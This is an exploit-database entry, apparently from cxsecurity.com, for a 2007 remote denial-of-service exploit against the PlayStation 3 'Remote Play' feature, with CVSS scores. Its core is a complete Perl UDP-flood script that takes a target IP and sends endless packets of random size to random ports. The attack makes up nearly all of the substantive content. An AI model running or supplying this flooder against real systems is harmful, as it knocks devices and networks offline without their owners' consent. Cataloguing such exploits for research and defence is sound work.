Playstation 3 "Remote Play" Remote DoS Exploit

2007.03.30
Credit: mak0b
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

#!/usr/bin/perl ####.:Playstation 3 "Remote Play" Remote DoS Exploit:.#### # # A UDP flood while the "remote play" feature is active # will result in a denial of service condition. # # Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A # # -Dark_K <mak0b[AT]inbox.com> # # POC code is based on odix's perl udp flooder ########################################################## use Socket; $ARGC=@ARGV; if ($ARGC !=1) { printf "usage: ./ps3rpdos.pl <ip>\n"; exit(1); } socket(crazy, PF_INET, SOCK_DGRAM, 17); $iaddr = inet_aton("$ARGV[0]"); printf "Sending...\n"; for (;;) { $size=$rand x $rand x $rand; $port=int(rand 65000) +1; send(crazy, 0, $size, sockaddr_in($port, $iaddr)); }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top